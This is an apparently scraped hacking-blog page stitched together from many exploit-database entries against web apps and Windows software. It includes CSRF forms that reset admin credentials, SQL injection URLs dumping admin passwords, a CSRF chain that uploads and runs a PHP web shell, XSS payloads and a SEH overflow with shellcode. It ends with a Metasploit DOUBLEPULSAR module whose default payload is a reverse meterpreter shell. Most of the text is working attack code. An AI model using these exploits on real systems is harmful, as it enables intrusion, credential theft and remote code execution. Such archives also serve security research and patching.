# Exploit Title: Drive Power Manager 1.10 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-29
# Homepage: https://www.hdtune.com/
# Software Link: https://www.hdtune.com/download.html
# Tested Version: v1.10
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt".
# Now start the program. Now in the field named: "Name" paste the "exploit.txt" content copied eariler.
# Click "Register" and see a crash!
#!/usr/bin/python
buffer = "A" * 6000
payload = buffer
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153552
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
[Change Password & Email Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://www.example.com/DSM/loader.php?load=account settings">
<input type="hidden" name="AccessCode" value="123456" />
<input type="hidden" name="ConfirmAccessCode" value="123456" />
<input type="hidden" name="Email" value="email@hotmail.com" />
<input type="hidden" name="MM_update" value="form2" />
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
<html>
<title>Iphobos Blog</title>
<label><a href="http://www.example.com/DSM/loader.php?load=data export
send&tableid=3" class="button white">Export Accounts</a></label>
</html>
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/DSM/loader.php?load=editsession&Id=null+and+1=2+union+select+username,2,3,4,AccessCode,6+from+adminstaff
http://www.example.com/DSM/loader.php?load=editterm&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4+from+adminstaff
http://www.example.com/DSM/loader.php?load=editclass&Id=null+and+1=2+union+select+concat(username,0x3a,AccessCode),2,3,4,5,6+from+adminstaff
source: https://www.securityfocus.com/bid/64720/info
Dredge School Administration System is prone to the following security vulnerabilities:
1. An SQL-injection vulnerability
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An information-disclosure vulnerability
5. A security-bypass vulnerability
Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
Dredge School Administration System 1.0 is vulnerable; other versions may also be affected.
II. Backup Download
##############
VULNERABILITY
##############
/Backup/processbackup.php (LINE: 89-93)
-----------------------------------------------------------------------------
//save file
// $handle =
fopen('db-backup-'.time().'-'.(md5(implode(',',$tables))).'.sql','w+');
$handle = fopen('RecordManager.sql','w+');
fwrite($handle,$return);
fclose($handle);
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
1. Open http://www.example.com/DSM/Backup/processbackup.php
2. When you open the link produces RecordManager.sql
3. to download backup [http://www.example.com/DSM/Backup/RecordManager.sql]
# Exploit Title: Dreamer CMS v4.0.0 - SQL Injection
# Date: 2022/10/02
# Exploit Author: lvren
# Vendor Homepage: http://cms.iteachyou.cc/
# Software Link: https://gitee.com/isoftforce/dreamer_cms/repository/archive/v4.0.0.zip
# Version: v4.0.0
# CVE: CVE-2022-43128
Proof Of Concept:
POST /admin/search/doSearch HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
Origin: http://localhost:8888
Connection: close
Referer: http://localhost:8888/admin/search/doSearch
Cookie: dreamer-cms-s=6387e44f-e700-462d-bba5-d4e0ffff5739
Upgrade-Insecure-Requests: 1
entity[typeid']=1) AND (SELECT 2904 FROM (SELECT(SLEEP(5)))TdVL) AND (5386=5386
lvren
lvren@lvre.ntesmail.com
签名由 网易灵犀办公 定制
# Exploit Title: Vulnerability XSS - Dreambox
# Shodan Dork: Dreambox 200
# Date: 12/10/2017
# Exploit Author: Thiago "THX" Sena
# Vendor Homepage: https://www.dreamboxupdate.com
# Version: 2.0.0
# Tested on: kali linux, windows 7, 8.1, 10
# CVE : CVE-2017-15287
Vulnerabilty: Cross-site scripting (XSS) in plugin BouquetEditor
---------------------------------------------------------------
PoC:
- First you go to ( http://IP:PORT/bouqueteditor/ )
- Then you go to the Bouquets tab, add a new bouquet
- Then put the script (<script>alert(1)</script>)
- Xss Vulnerability
source: https://www.securityfocus.com/bid/50520/info
DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
DreamBox DM800 versions 1.5rc1 and prior are vulnerable.
http://www.example.com/file/?file=[LFD]
<!--
# Exploit Title: Dream Gallery 2.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0
--!>
=======================================================================================================
Dream Gallery 2.0 Admin panel Authentication bypass
Description : An Attackers are able to completely compromise the web application built upon
Dream Gallery as they can gain access to the admin panel and
manage the website as an admin without prior authentication!
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php
Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including content change,add admin user .. etc
=======================================================================================================
potential fix
<?php
session_start();
if (!isset($_SESSION["auth"])) {
exit(header('Location: admin/login.php'));
}
?>
[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
<!--
# Exploit Title: Dream Gallery - CSRF Add Admin Exploit
# Google Dork: "Design by Rafael Clares"
# Date: 2016/06/03
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://phpstaff.com.br/
# Version: 1.0
#Exploit:
-->
<html>
<body>
<form method="post" action="http://localhost/{PACH}/admin/usuario.php?action=incluir">
<input type="hidden" name="user_login" value="ali">
<input type="hidden" name="user_password" type="hidden" value="123456" >
<input type="hidden" name="user_email" value="">
<input type="submit" value="create">
</form>
</body>
</html>
<!--
#########################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->
<!--
Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution
Vendor: Dream CMS
Product web page: http://www.dream-cms.kg
Affected version: 2.3.0
Summary: DreamCMS is open and completely free PHP web application
for constructing websites of any complexity.
Desc: Dream CMS allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a
logged-in user visits a malicious web site. Related to the CSRF issue, an
authenticated arbitrary PHP code execution exist. The vulnerability is caused
due to the improper verification of uploaded files in '/files-manager-administration/add-file'
script via the 'file' POST parameter which allows of arbitrary files being
uploaded in '/resource/filemanager/1/home/' where the admin first needs to add
the file extension in the allowed list (csrf'd). This can be exploited to execute
arbitrary PHP code by uploading a malicious PHP script file and execute system
commands.
Tested on: nginx/1.6.2
PHP/5.5.28
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5268
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5268.php
01.10.2015
-->
<html>
<head>
<title>Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution</title>
</head>
<body onload="exploitrun();">
<!-- 1. Add PHP allowed extension -->
<form name="addext" action="http://TARGET/pages/en/files-manager-administration/settings" method="POST" target="frame0">
<input type="hidden" name="form_name" value="settings" />
<input type="hidden" name="file_manager_allowed_extensions" value="bmp,gif,jpg,png,mp3,wav,wma,3g2,3gp,avi,flv,mov,mp4,mpg,swf,vob,wmv,zip,rar,txt,doc,docx,pdf,php" />
<input type="hidden" name="file_manager_allowed_size" value="2097152" />
<input type="hidden" name="file_manager_file_name_length" value="20" />
<input type="hidden" name="file_manager_image_extensions" value="bmp,gif,jpg,png" />
<input type="hidden" name="file_manager_media_extensions" value="mp3,wav,wma,3g2,3gp,avi,flv,mov,mp4,mpg,swf,vob,wmv" />
<input type="hidden" name="file_manager_window_width" value="60" />
<input type="hidden" name="file_manager_window_height" value="500" />
<input type="hidden" name="file_manager_window_image_height" value="300" />
<input type="hidden" name="submit" value="Save" />
</form>
<!-- 2. Upload PHP file -->
<script>
function upload()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://TARGET/pages/en/files-manager-administration/add-file?path=home", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuCEcIcPhpF3WD8Sv");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"form_name\"\r\n" +
"\r\n" +
"file\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"billy.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_GET[\"cmd\"]);\r\n" +
"?\x3e\r\n" +
"\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Submit\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form name="uploadme" action="javascript:upload();" target="frame1">
</form>
<!-- 3. Code execution -->
<form name="exploit" action="http://TARGET/resource/filemanager/1/home/billy.php" method="GET" target="frame2">
<input type="hidden" name="cmd" value="whoami" />
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<script>
function exploitrun()
{
document.addext.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.uploadme.submit();
document.getElementsByTagName("iframe")[1].onload = function()
{
document.exploit.submit();
}
}
}
</script>
</body>
</html>
# Title: Draytek VigorAP 1000C - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-05-07
# Vendor: https://www.draytek.com/
# Software: https://www.draytek.com/products/vigorap-903/
# CVE: N/A
Document Title:
===============
Draytek VigorAP - (RADIUS) Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2244
Common Vulnerability Scoring System:
====================================
4
Product & Service Introduction:
===============================
https://www.draytek.com/
https://www.draytek.com/products/vigorap-903/
Affected Product(s):
====================
Draytek
[+] VigorAP 1000C | 1.3.2
[+] VigorAP 700 | 1.11
[+] VigorAP 710 | 1.2.5
[+] VigorAP 800 | 1.1.4
[+] VigorAP 802 | 1.3.2
[+] VigorAP 810 | 1.2.5
[+] VigorAP 900 | 1.2.0
[+] VigorAP 902 | 1.2.5
[+] VigorAP 903 | 1.3.1
[+] VigorAP 910C | 1.2.5
[+] VigorAP 912C | 1.3.2
[+] VigorAP 918R Series | 1.3.2
[+] VigorAP 920R Series | 1.3.0
[+] All other VigorAP Series with Radius Module
Vulnerability Disclosure Timeline:
==================================
2020-05-07: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation vulnerability has been discovered in the
official Draytek VigorAP product series application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent input validation web vulnerability is located in the
username input field of the RADIUS Setting - RADIUS Server
Configuration module. Remote attackers with limited access are able to
inject own malicious persistent script codes as username.
Other privileged user accounts execute on preview of the modules
context. The request method to inject is POST and the attack
vector is located on the application-side.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Vulnerable Module(s):
[+] RADIUS Setting - RADIUS Server Configuration - Users Profile
Vulnerable Input(s):
[+] Username
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information an steüs below to continue.
PoC: Payload
<iframe src=evil.source onload=alert(document.domain)></iframe>
PoC: Vulnerable Source (http:/vigorAP.localhost:50902/home.asp)
<div class="box">
<table width="652" cellspacing="1" cellpadding="2">
<tbody><tr>
<th id="userName">Username</th>
<th id="passwd">Password</th>
<th id="confirmPasswd">Confirm Password</th>
<th id="configure">Configure</th>
</tr>
<tr>
<td><input maxlength="24" type="text" id="addusr"></td>
<td><input maxlength="24" type="password" id="addpwd"></td>
<td><input maxlength="24" type="password" id="addpwdcfm"></td>
<td><input type="button" id="btnAddUser" value="Add" class="add"
onclick="addUser()">
<input type="button" id="btnCancelUser" value="Cancel" class="add"
onclick="cancelUser()"></td>
</tr>
</tbody></table>
<table class="content" width="652" cellspacing="1" cellpadding="2">
<tbody id="usersTb">
<tr>
<th id="userNo">NO.</th>
<th id="userNames">Username</th>
<th id="userSelect">Select</th>
</tr>
<tr><td>1</td><td>test</td><td><input type="checkbox"><input
type="hidden" value="test"></td></tr>
tr><td>2</td><td><iframe src=evil.source
onload=alert(document.domain)></iframe></td><td><input type="checkbox">
<input type="hidden" value="asd"></td></tr></tbody>
</table>
<p><input type="button" id="btnDelSelUser" value="Delete Selected"
class="del" onclick="delSelUser()">
<input type="button" id="btnDelAllUser" value="Delete All" class="del"
onclick="delAllUser()">
</p></div>
Reference(s):
http:/vigorAP.localhost:50902/
http:/vigorAP.localhost:50902/home.asp
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
Drale DBTableViewer v100123 - Blind SQL Injection
# Exploit Title: drale DBTableViewer - SQL Injection(Blind/Error Base)
# Date: 2016-06-08
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://drale.com/
# Software Link: https://github.com/drale/DBTableViewer/archive/master.zip
# Version: Drale DBTableViewer v100123
# Tested on: Debian [wheezy]
# CVE : none
### VULNERABILITY
"orderby" parameter in DBTableViewer is vulnerable.
This parameter can be performed using blind injection.
### SQLMAP QUERY
#> sqlm -u "http://127.0.0.1/vul_test/DBTableViewer/?orderby=nice_name&sort=DESC" --level 4 --risk 3 --dbms=mysql
### SQLMAP OUTPUT
sqlmap identified the following injection points with a total of 727 HTTP(s) requests:
---
Parameter: orderby (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: orderby=nice_name RLIKE (SELECT (CASE WHEN (1697=1697) THEN 0x6e6963655f6e616d65 ELSE 0x28 END))&sort=DESC
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: orderby=nice_name AND EXTRACTVALUE(6590,CONCAT(0x5c,0x7162766a71,(SELECT (CASE WHEN (6590=6590) THEN 1 ELSE 0 END)),0x71787a7671))&sort=DESC
Type: AND/OR time-based blind
Title: MySQL >= 5.0 time-based blind - Parameter replace
Payload: orderby=(SELECT (CASE WHEN (6082=6082) THEN SLEEP(5) ELSE 6082*(SELECT 6082 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&sort=DESC
---
[12:03:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.1
....
[12:07:33] [INFO] retrieved: zoph
[12:07:33] [INFO] retrieved: zzzz
available databases [25]:
[*] "
[*] ""
[*] '
[*] ''
[*] '''
[*] api
[*] blackcat
[*] edusec
# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path
# Discovery Date: 2022-05-07
# Discovery by: Esant1490
# Vendor Homepage: https://drfone.wondershare.net
# Software Link : https://download.wondershare.net/drfone_full4008.exe
# Tested Version: 4.0.8
# Tested on OS: Windows 10 Pro x64 en
# Vulnerability Type: Unquoted Service Path
# Find the discover Unquoted Service Path Vulnerability:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "C:\Windows\\" |findstr /i /v """
Wondershare Install Assist Service Wondershare InstallAssist
C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto
Wondershare Application Framework Service WsAppService C:\Program Files
(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto
Wondershare Application Update Service 3.0
WsAppService3 C:\Program Files
(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto
Wondershare Driver Install Service WsDrvInst C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto
# Service info:
C:\>sc qc WsDrvInst
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: WsDrvInst
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Wondershare Driver Install Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit:
A successful attempt to exploit this vulnerability could allow to execute
code during startup or reboot with the elevated privileges.
source: https://www.securityfocus.com/bid/67727/info
dpkg is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues will allow local attackers to modify files outside the destination directory and possibly gain access to the system.
dpkg 1.3.0 is vulnerable; other versions may also be affected.
,--- exploit.patch ---
Index: index/symlink/index-file
@@ -0,0 +1,1 @@
+Escaped
`---
#!/usr/bin/python #
# Exploit Title: Download Accelerator Plus DAP 10.0.6.0 - SEH Buffer Overflow #
# Date: 2019-04-05 #
# Vendor Homepage: http://www.speedbit.com/dap/ #
# Software Link: http://www.speedbit.com/dap/download/downloading.asp #
# Exploit Author: Peyman Forouzan #
# Tested Version: 10.0.6.0 #
# Tested on: Win10 Enterprise 64 bit #
# Note : In other versions of Windows, it will cause the program to Crash #
# Special Thanks to my wife #
# Steps : #
# 1- Run python code : Dap.py ( Dap.txt is created ) #
# 2- Open the APP --> File --> Import --> Html Web Page --> paste in contents from the Dap.txt into #
# Import Web Page --> Ok --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
junk = "\x41" * 4091
nseh = "\x61\x62"
seh = "\x57\x42" # Overwrite Seh # 0x00420057 : {pivot 8}
prepare = "\x44\x6e\x53\x6e\x58\x6e\x05"
prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3"
prepare += "\x41" * 107;
# calc unicode shell - can be replaced with shellcode
calc = "PPYAIAIAIAIAQATAXAZAPA3QADAZA"
calc += "BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA"
calc += "58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB"
calc += "AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K"
calc += "22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL"
calc += "MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55"
calc += "Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V"
calc += "NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB"
calc += "R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT"
calc += "NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU"
calc += "89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM"
calc += "KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC"
calc += "QQ2LRCM0LJA";
buffer = "http://" + junk + nseh + seh + prepare + calc
print "[+] Creating %s bytes payload ..." %len(buffer)
f = open ("Dap.txt", "w")
print "[+] File created!"
f.write(buffer)
f.close()
EDB Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47685.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::SMB::Client
MAX_SHELLCODE_SIZE = 4096
def initialize(info = {})
super(update_info(info,
'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',
'Description' => %q{
This module executes a Metasploit payload against the Equation Group's
DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.
While this module primarily performs code execution against the implant,
the "Neutralize implant" target allows you to disable the implant.
},
'Author' => [
'Equation Group', # DOUBLEPULSAR implant
'Shadow Brokers', # Equation Group dump
'zerosum0x0', # DOPU analysis and detection
'Luke Jennings', # DOPU analysis and detection
'wvu', # Metasploit module and arch detection
'Jacob Robles' # Metasploit module and RCE help
],
'References' => [
['MSB', 'MS17-010'],
['CVE', '2017-0143'],
['CVE', '2017-0144'],
['CVE', '2017-0145'],
['CVE', '2017-0146'],
['CVE', '2017-0147'],
['CVE', '2017-0148'],
['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],
['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],
['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],
['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],
['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']
],
'DisclosureDate' => '2017-04-14',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X64,
'Privileged' => true,
'Payload' => {
'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,
'DisableNops' => true
},
'Targets' => [
['Execute payload', {}],
['Neutralize implant', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'EXITFUNC' => 'thread',
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
},
'Notes' => {
'AKA' => ['DOUBLEPULSAR'],
'RelatedModules' => [
'auxiliary/scanner/smb/smb_ms17_010',
'exploit/windows/smb/ms17_010_eternalblue'
],
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION]
}
))
register_advanced_options([
OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),
OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])
])
end
OPCODES = {
ping: 0x23,
exec: 0xc8,
kill: 0x77
}
STATUS_CODES = {
not_detected: 0x00,
success: 0x10,
invalid_params: 0x20,
alloc_failure: 0x30
}
def calculate_doublepulsar_status(m1, m2)
STATUS_CODES.key(m2.to_i - m1.to_i)
end
# algorithm to calculate the XOR Key for DoublePulsar knocks
def calculate_doublepulsar_xor_key(s)
x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
x & 0xffffffff # this line was added just to truncate to 32 bits
end
# The arch is adjacent to the XOR key in the SMB signature
def calculate_doublepulsar_arch(s)
s == 0 ? ARCH_X86 : ARCH_X64
end
def generate_doublepulsar_timeout(op)
k = SecureRandom.random_bytes(4).unpack('V').first
0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00
end
def generate_doublepulsar_param(op, body)
case OPCODES.key(op)
when :ping, :kill
"\x00" * 12
when :exec
Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))
end
end
def check
ipc_share = "\\\\#{rhost}\\IPC$"
@tree_id = do_smb_setup_tree(ipc_share)
vprint_good("Connected to #{ipc_share} with TID = #{@tree_id}")
vprint_status("Target OS is #{smb_peer_os}")
vprint_status('Sending ping to DOUBLEPULSAR')
code, signature1, signature2 = do_smb_doublepulsar_pkt
msg = 'Host is likely INFECTED with DoublePulsar!'
case calculate_doublepulsar_status(@multiplex_id, code)
when :success
@xor_key = calculate_doublepulsar_xor_key(signature1)
@arch = calculate_doublepulsar_arch(signature2)
arch_str =
case @arch
when ARCH_X86
'x86 (32-bit)'
when ARCH_X64
'x64 (64-bit)'
end
vprint_good("#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}")
CheckCode::Vulnerable
when :not_detected
vprint_error('DOUBLEPULSAR not detected or disabled')
CheckCode::Safe
else
vprint_error('An unknown error occurred')
CheckCode::Unknown
end
end
def exploit
if datastore['DefangedMode']
warning = <<~EOF
Are you SURE you want to execute code against a nation-state implant?
You MAY contaminate forensic evidence if there is an investigation.
Disable the DefangedMode option if you have authorization to proceed.
EOF
fail_with(Failure::BadConfig, warning)
end
# No ForceExploit because @tree_id and @xor_key are required
unless check == CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')
end
case target.name
when 'Execute payload'
unless @xor_key
fail_with(Failure::NotFound, 'XOR key not found')
end
if @arch == ARCH_X86
fail_with(Failure::NoTarget, 'x86 is not a supported target')
end
print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")
shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])
shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)
vprint_status("Total shellcode length: #{shellcode.length} bytes")
print_status("Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}")
xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)
print_status('Sending shellcode to DOUBLEPULSAR')
code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)
when 'Neutralize implant'
return neutralize_implant
end
case calculate_doublepulsar_status(@multiplex_id, code)
when :success
print_good('Payload execution successful')
when :invalid_params
fail_with(Failure::BadConfig, 'Invalid parameters were specified')
when :alloc_failure
fail_with(Failure::PayloadFailed, 'An allocation failure occurred')
else
fail_with(Failure::Unknown, 'An unknown error occurred')
end
ensure
disconnect
end
def neutralize_implant
print_status('Neutralizing DOUBLEPULSAR')
code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])
case calculate_doublepulsar_status(@multiplex_id, code)
when :success
print_good('Implant neutralization successful')
else
fail_with(Failure::Unknown, 'An unknown error occurred')
end
end
def do_smb_setup_tree(ipc_share)
connect
# logon as user \
simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])
# connect to IPC$
simple.connect(ipc_share)
# return tree
simple.shares[ipc_share]
end
def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)
# make doublepulsar knock
pkt = make_smb_trans2_doublepulsar(opcode, body)
sock.put(pkt)
bytes = sock.get_once
return unless bytes
# convert packet to response struct
pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct
pkt.from_s(bytes[4..-1])
return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']
end
def make_smb_trans2_doublepulsar(opcode, body)
setup_count = 1
setup_data = [0x000e].pack('v')
param = generate_doublepulsar_param(opcode, body)
data = param + body.to_s
pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct
simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2
